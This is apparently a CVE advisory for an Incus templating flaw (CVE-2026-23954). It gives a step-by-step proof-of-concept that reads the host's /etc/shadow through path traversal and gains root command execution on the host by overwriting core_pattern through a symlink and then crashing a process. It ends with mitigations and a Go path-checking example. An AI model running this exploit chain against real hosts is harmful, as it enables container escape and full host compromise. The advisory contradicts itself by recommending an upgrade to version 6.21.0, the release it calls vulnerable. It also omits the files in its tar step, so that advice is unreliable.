How CVE-2026-23954 Works
Incus is a system container and virtual machine manager. Versions 6.21.0 and below allow a user with the ability to launch a container with a custom image (e.g., a member of the `incus` group) to use directory traversal or symbolic links in the templating functionality to achieve arbitrary file read and write on the host, ultimately resulting in arbitrary command execution on the host.
When using an image with a `metadata.yaml` containing templates, neither the source nor the target path is checked for symbolic links or directory traversal. For example, the following `metadata.yaml` snippet can read an arbitrary file from the host root filesystem as root and place it inside the container:
```yaml
templates:
  /shadow:
    when:
      - start
    template: ../../../../../../../../etc/shadow
```
Additionally, the path of the target of the template is not checked or opened safely and can therefore contain symbolic links pointing outside the container root filesystem. For example:
```yaml
templates:
  /realroot/proc/sys/kernel/core_pattern:
    when:
      - start
    template: core_pattern.tpl
```
Here the container root filesystem contains a symbolic link named `/realroot` pointing to `/`. This causes the contents of the template to be written to the host root filesystem as root. This can be exploited to achieve arbitrary command execution on the host by overwriting key files such as `/proc/sys/kernel/core_pattern`, followed by causing a crash inside the container to execute arbitrary commands on the host.
The vulnerability exists in Incus’s container image templating system within the `driver_lxc.go` source file. When an instance starts, the code processes a `metadata.yaml` file that defines file templates. The `source` path for the template content and the `target` path for its final location are not adequately sanitized. An attacker can craft a `metadata.yaml` where the `template:` source field uses directory traversal sequences like ../../../../etc/shadow. This causes Incus to read arbitrary host files as root and copy their content into the container. Furthermore, if the container’s root filesystem contains a symbolic link (e.g., `/realroot` -> /), the target path for the template can leverage this symlink. A path like `/realroot/proc/sys/kernel/core_pattern` will resolve on the host, allowing an attacker to write a controlled template file to any host location. By overwriting critical files like core_pattern, a subsequent container crash triggers the execution of attacker-defined shell commands with root privileges on the host operating system.
DailyCVE Form
Platform: Incus
Version: <= 6.21.0
Vulnerability: Path Traversal/Symlink
Severity: Critical
Date: 2026-01-22
Prediction: Patch expected 2026-01-24
What Undercode Say
Analytics
The vulnerability is trivially exploitable for host-level Remote Code Execution (RCE). A proof of concept is available. The attack requires container launch permissions (incus group).
Check Incus version:
```sh
incus version
```
Manual Reproduction Steps:
1. Obtain and unpack a legitimate root filesystem (e.g., alpine/edge) into a directory named `rootfs`.
2. Inside the unpacked root filesystem, create a symbolic link named `realroot`:
   ```sh
   ln -s / rootfs/realroot
   ```
3. Create a directory named `templates` alongside the `rootfs` directory. Include a file `core_pattern.tpl` containing:
   ```
   |/bin/sh -c "%E"
   ```
4. Add files `segfault.c` and `stage2` to the root filesystem, setting `stage2` executable:
   ```sh
   chmod +x rootfs/stage2
   ```
5. Create a `metadata.yaml` for this image:
   ```yaml
   templates:
     /shadow:
       when:
         - start
       template: ../../../../../../../../etc/shadow
     /realroot/proc/sys/kernel/core_pattern:
       when:
         - start
       template: core_pattern.tpl
   ```
6. Create the image archive and import into Incus:
   ```sh
   tar cf poc.tar
   incus image import poc.tar --alias poc
   ```
7. Launch the newly imported image and obtain a shell:
   ```sh
   incus launch poc poc --ephemeral
   incus shell poc
   ```
8. Observe that the file `/shadow` inside the container contains the contents of the `/etc/shadow` file from the host (host file read vulnerability).
segfault.c:
```c
int main() {
    int *p = 0;
    *p = 42; /* write through a null pointer so the process crashes */
    return 0;
}
```
stage2:
```sh
#!/bin/sh
id > /host_rootfs_poc_file
```
Exploit
1. Create malicious image with `metadata.yaml` and symlinks.
2. Import and launch the image.
3. Trigger crash to execute `core_pattern` command.
Protection
- Apply vendor patch (upgrade to Incus version 6.21.0 or 6.0.6).
- Restrict membership of the `incus` and `incus-admin` groups to trusted administrators only.
- Disable the ability for unprivileged users to import custom images.
- Validate template paths.
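One way to implement the "Validate template paths" item, as an added Go example (not Incus's code or its patch; `checkSource` and `checkTarget` are hypothetical names). It rejects a template source that climbs out of the templates directory and a target that passes through a symlink in the unpacked rootfs, using the two paths from the write-up as constructed input.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// checkSource accepts a metadata.yaml "template:" value only if it is a local
// relative path, i.e. it cannot climb out of the image's templates directory.
func checkSource(name string) error {
	if !filepath.IsLocal(name) {
		return fmt.Errorf("template source %q leaves the templates directory", name)
	}
	return nil
}

// checkTarget walks the template target under rootfs one component at a time
// and rejects it if any existing component is a symbolic link.
// Lstat-based, so suited to auditing an unpacked image at rest; code that
// writes into a live rootfs should open relative to a directory handle instead.
func checkTarget(rootfs, target string) error {
	cur := rootfs
	isSep := func(r rune) bool { return r == '/' }
	for _, part := range strings.FieldsFunc(filepath.Clean("/"+target), isSep) {
		cur = filepath.Join(cur, part)
		fi, err := os.Lstat(cur)
		if os.IsNotExist(err) {
			return nil // nothing further exists, so nothing further can redirect
		}
		if err != nil {
			return err
		}
		if fi.Mode()&os.ModeSymlink != 0 {
			return fmt.Errorf("template target %q passes through symlink %q", target, cur)
		}
	}
	return nil
}

func main() {
	// Constructed sample: an unpacked rootfs that holds the realroot link.
	dir, _ := os.MkdirTemp("", "img")
	defer os.RemoveAll(dir)
	os.Symlink("/", filepath.Join(dir, "realroot"))
	fmt.Println(checkSource("../../../../../../../../etc/shadow"))
	fmt.Println(checkTarget(dir, "/realroot/proc/sys/kernel/core_pattern"))
	fmt.Println(checkSource("core_pattern.tpl"), checkTarget(dir, "/etc/hostname"))
}
```

Running such a check over `metadata.yaml` and the unpacked `rootfs` before an image is imported flags both template entries shown in the reproduction steps.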
Impact
- Host file read/write.
- Root command execution.
- Complete host compromise.
Sources:
Reported By: github.com

